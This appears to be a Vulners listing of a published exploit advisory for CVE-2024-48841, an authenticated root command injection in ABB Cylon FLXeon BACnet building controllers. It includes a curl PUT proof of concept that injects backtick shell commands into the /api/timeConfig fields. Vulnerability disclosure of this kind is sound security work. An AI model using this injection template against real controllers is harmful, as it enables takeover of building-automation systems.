Vulners
Lucene search
ABB Cylon FLXeon 9.3.4 - Remote Code Execution (Authenticated)
| Reporter | Title | Published | Views | Family All 25 |
|---|---|---|---|---|
 | ABB Cylon FLXeon 9.3.4 login.js Unauthenticated Root Remote Code Execution Exploit | 3 Feb 202500:00 | – | zdt |
| ABB Cylon FLXeon 9.3.4 cmds.js Authenticated Root Remote Code Execution Exploit | 3 Feb 202500:00 | – | zdt |
| ABB Cylon FLXeon 9.3.4 upload.js Authenticated Root Remote Code Execution Exploit | 3 Feb 202500:00 | – | zdt |
| ABB Cylon FLXeon 9.3.4 timeConfig.js Authenticated Root Remote Code Execution Exploit | 3 Feb 202500:00 | – | zdt |
 | CVE-2024-48841 | 27 Jan 202520:16 | – | circl |
 | ABB FLXeon 安全漏洞 | 27 Jan 202500:00 | – | cnnvd |
 | CVE-2024-48841 | 27 Jan 202519:25 | – | cve |
 | CVE-2024-48841 Remote Code Execution (RCE) Vulnerabilities | 27 Jan 202519:25 | – | cvelist |
 | ABB Cylon FLXeon 9.3.4 - Remote Code Execution (RCE) | 11 Apr 202500:00 | – | exploitdb |
 | EUVD-2024-43245 | 3 Oct 202520:07 | – | euvd |
10
# Exploit Title: ABB Cylon FLXeon 9.3.4 - Remote Code Execution (Authenticated)
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series)
CBX Series (FLX Series)
CBT Series
CBV Series
Firmware: <=9.3.4
Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a
series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™
building management solutions. ABB BACnet controllers are designed for intelligent
control of HVAC equipment such as central plant, boilers, chillers, cooling towers,
heat pump systems, air handling units (constant volume, variable air volume, and
multi-zone), rooftop units, electrical systems such as lighting control, variable
frequency drives and metering.
The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented
connectivity and open integration for your building automation systems. It's scalable,
and modular, allowing you to control a diverse range of HVAC functions.
Desc: The ABB Cylon FLXeon BACnet controller is vulnerable to authenticated remote root
code execution via the /api/timeConfig endpoint. An attacker with valid credentials
can inject arbitrary system commands by manipulating parameters such as tz, timeServerYN,
and multiple timeDate fields. The vulnerability exists due to improper input validation
in timeConfig.js, where user-supplied data is executed via ChildProcess.exec() without
adequate sanitization.
Tested on: Linux Kernel 5.4.27
Linux Kernel 4.15.13
NodeJS/8.4.0
Express
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5910
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5910.php
CVE ID: CVE-2024-48841
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48841
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl -k -X PUT "https://7.3.3.1/api/timeConfig" \
> -H "Cookie: user_sid=xxx" \
> -H "Content-Type: application/json" \
> -d '{"timeConfig":{"timeDate":{\
> "yy":"`sleep 17`",\
> "mm":"`sleep 17`",\
> "dd":"`sleep 17`",\
> "h":"`sleep 17`",\
> "m":"`sleep 17`",\
> "s":"`sleep 17`"},\
> "tz":"`sleep 17`",\
> "tzList":[],\
> "timeServerYN":"`sleep 17`",\
> "timeServer":"1.1.1.1",\
> "timeServerSync":false}}'Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Apr 2025 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 410
CVSS 3.110
EPSS0.06246
SSVC